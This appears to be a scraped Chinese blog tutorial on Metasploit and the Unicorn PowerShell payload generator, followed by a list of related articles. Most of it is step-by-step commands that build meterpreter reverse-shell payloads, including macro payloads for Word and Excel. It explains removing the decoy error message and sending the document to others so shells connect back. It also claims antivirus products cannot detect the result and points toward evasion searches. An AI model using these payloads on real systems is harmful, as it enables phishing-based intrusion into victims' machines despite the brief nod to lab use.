MSF 全称:metasploit-framework    渗透大杀器,黑客工具排名第一(靠前),尤其在内网中。在校期间大学生先跟本校安全部沟通好,一起实验。

得不到校方理解与认可的上SRC或者自己搭建靶机。为什么在当今,政府,学校,公司等网络不堪一击,就是因为感觉不到损失嘛,你会买保险?出了很多事情了才知道痛,道理都是一样的。组织要赚钱,而安全呢?安全是在烧钱,买着买来,招聘一个信息安全的人还动不动就上万。不被老板套路,炒掉你换实习生就实属你上辈子修来的福气了。

开源地址:github.com/rapid7/metasploit-framework

安全这几年才慢慢浮出水面进入到更多人的视野中。大家不必拿着漏洞强行去怼别人,每个人都有自己的生活圈子,不理解你的专业也实属正常现象。我们不也不清楚,医学,法律吗?你说学校网络一点都不安全的情况,就等于学法律的人在怼我们,大家没有一点法律意识一样。

摆正心态:得到认可与奖励,实属幸运。得不到认可甚至被质疑也不要丧气,余弦在校期间还没有学安全呢,就得到了知道创宇CEO的青睐,亲自访校邀请他加入。

Unicorn 独角兽             国外很喜欢用powershell溢出攻击注入shellcode就可以得到权限

开源地址:https://github.com/trustedsec/unicorn

git clone https://github.com/trustedsec/unicorn            【使用方法】

cd unicorn

python unicorn.py

python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999    【反向链接,IP端口自然是自己的机器,输出两个攻击载荷文件】

msfconsole -r unicorn.rc

. \powershell_attack.psl          【目标机执行】

sessions -i             【看监听会话是否反弹的会话】

sessions -i   1         【进入反弹的会话】

ls               【查看目标机文件】

python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999 macro      【生成宏攻击的反向链接】利用宏,调用powershell的一种攻击载荷。

可以将生成的宏攻击载荷复制粘贴到word,ecxel里面。删掉尾巴上面的假装报错,实验阶段不要误导自己了。别让它提示任何信息。

文档发给别人,shell又反弹回来了。因为本身windows就自带,不仅是360,其他的都识别不了。免杀就不多说了  百度   msf 免杀

python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999 hta

[7期]美少妇(msf)和独角兽(unicorn)的更多相关文章

  1. 内网渗透之权限维持 - MSF

    年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr ...

  2. [转]初探Metasploit的自动攻击

    1. 科普Metasploit   以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...

  3. ms17-010 永恒之蓝漏洞复现(CVE-2017-0143)

    0x01 首先对目标机的开放端口进行探测,我们可以使用探测神器nmap 发现开放的445端口,然后进行下一步的ms17-010的漏洞验证 0x02 打开MSF美少妇神器,用search命令搜索ms17 ...

  4. 打靶笔记-03-vulhub-Moriarty Corp

    打靶笔记-03-vulhub-BoredHackerBlog 一.靶机信息 Name: BoredHackerBlog: Moriarty Corp(中-高级难度) Date release: 29 ...

  5. 漫谈程序员系列:3D打印能打印出程序员吗

    首先声明,本文是一本正经的胡扯,绝不是随随便便的胡扯,请您不要随便攻击我胡说八道.我要反复星爷在<喜剧之王>里的台词:事实上.我是一本正经的喷子. 3D打印的定义 关于3D打印,以下是来自 ...

  6. Keep、小红书、美图…独角兽App能拿到新一轮救命钱吗?

    大多数人热爱手机,不是因为时尚的外观或者结实的零部件,而是因琳琅满目的App赋予其太多的功能.智能手机最先是清理掉人类的零碎时间,现如今又开始肢解我们大块的时间,或者说,智能手机本身就是生活.在如此背 ...

  7. 投稿007期|令人震惊到发指的PyObject对象代码设计之美

    前言 最近在重温经典漫画<SlamDunk>的全国大赛篇,其中的一个情形可以很好的诠释虎躯一震这个状态——当樱木看到流川枫一次高难度投篮时内心的感受:“经过两万次射球练习后,樱木首次明白到 ...

  8. 20155326刘美岑《网络对抗》Exp5 MSF基础应用

    基础问题回答 解释exploit,payload,encode是什么: exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令. payload:是攻击载荷,是我们在攻击过程中真正用到的部 ...

  9. [家里蹲大学数学杂志]第237期Euler公式的美

    1 Euler 公式 $e^{i\pi}+1=0$ (1) 它把 a.  $e:$ 自然对数的底 $\approx 2. 718281828459$ (数分) b.  $i$: 虚数单位 $=\sqr ...

随机推荐

  1. MFC框架各部分指针获取方式

    MFC框架各部分指针获取方式 前人在CSDN总结的,曾经帮助过我,整理总结一下,希望也能帮助一下别人. 获得CWinApp 获得CMainFrame 获得CChildFrame 获得CDocument ...

  2. RocksDB存储引擎测试

    一:安装搭建(两个节点都要安装) yum install http://www.percona.com/downloads/percona-release/redhat/0.1-4/percona-r ...

  3. 使用IP在局域网内访问System.Net.HttpListenerException:“拒绝访问。”

    记录一下,自己写的程序之前运行没有遇到这个问题,突然遇到这个问题,找了一圈没有找到有效的解决方案,到最后发现,以管理员身份运行程序即可.简单记录一下. 还有就是 .UseUrls("http ...

  4. spark复习笔记(4):RDD变换

    一.RDD变换 1.返回执行新的rdd的指针,在rdd之间创建依赖关系.每个rdd都有一个计算函数和指向父rdd的指针 Spark是惰性的,因此除非调用某个转换或动作,否则不会执行任何操作,否则将触发 ...

  5. sqli(7)

    前言 第7关 导出文件GET字符型注入 步骤OK,但是就是不能写入文件,不知是文件夹的问题还是自己操作的问题.但是确实,没有导入成功. 1. 查看闭合,看源码,发现闭合是((‘ ’)): 2.查看所在 ...

  6. linux查看 inotify 提供的工具

    [root@rsync-client-inotify ~]# ll /usr/local/bin/inotify* -rwxr-xr-x. 1 root root 38582 Jun 3 22:23 ...

  7. shell脚本--expect自动应答

    expect自动应答  TCL语言 需求1:远程登录到A主机,什么事情也不做 #! /usr/bin/env expect # 开启一个程序 spawn ssh root@192.144.213.11 ...

  8. 启动模式:uefi, legacy,以及GRUB命令使用

    机器启动模式:uefi, legacy 设置入口:BIOS:boot mode 磁盘分区表格式: gpt uefi所使用(此种模式下,grub只能识别gpt格式的boot引导项) mbr legacy ...

  9. Java+Maven的工程运行Sonar的方式

    step 1:在maven->setting.xml中进行配置 修改mvn工程所用的setting.xml文件,在<profiles></profiles>节点中增加: ...

  10. TFRecords文件的生成和读取(1)

    参考:https://blog.csdn.net/u012222949/article/details/72875281 参考:https://blog.csdn.net/chengshuhao199 ...